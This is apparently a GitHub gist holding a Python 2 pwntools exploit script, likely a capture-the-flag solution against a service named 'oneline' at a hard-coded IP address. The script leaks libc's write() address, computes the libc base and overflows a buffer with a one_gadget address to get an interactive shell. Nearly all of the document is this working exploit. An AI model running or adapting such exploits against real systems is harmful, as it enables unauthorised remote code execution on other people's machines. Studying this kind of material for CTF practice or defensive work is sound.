@ywkw1717
Created May 26, 2019 12:09
#!/usr/bin/env python
from pwn import *
def main():
    """Drive one session against the 'oneline' service in two fixed steps.

    The recv/send calls are positional (prompt, 32 bytes, then a 6-byte value)
    and must stay in exactly this order; nothing here is reusable outside that
    protocol. Opens a network connection and ends in an interactive shell on
    the socket, so there is no return value.
    """
    # Remote endpoint is hard-coded; the commented-out process() line is the
    # local-binary alternative it was presumably tested against.
    # conn = process("./oneline")
    conn = remote("153.120.129.186", 10000)
    # Only libc.symbols["write"] is read from this file; the offsets in
    # one_gadget below are specific to this exact libc build and are not
    # valid for any other (the commented system-libc line would need them
    # recomputed).
    libc = ELF("./libc-2.27.so")
    # libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]
    # first payload
    payload = "A" * 4
    # NOTE: Python 2 print statements throughout; the str concatenation on
    # the u64 line below also assumes recv() returns str, so this script is
    # Python 2 only.
    print conn.recvuntil(">> ")
    conn.sendline(payload)
    conn.recv(32)
    # Six bytes come back; pad to eight so u64 can decode a little-endian
    # 64-bit value.
    leak_addr = u64(conn.recv(6) + "\x00\x00")
    # Subtracting write()'s offset in this libc gives the mapping base.
    libc_base = leak_addr - libc.symbols["write"]
    print hex(leak_addr)
    print hex(libc_base)
    # second payload
    payload = "A" * 32
    # one_gadget[1] (0x4f322) is the entry chosen here; the other two are unused.
    payload += p64(libc_base + one_gadget[1])
    print conn.recvuntil(">> ")
    conn.sendline(payload)
    conn.interactive()
if __name__ == '__main__':
    # Entry point guard: run only when executed as a script, not on import.
    main()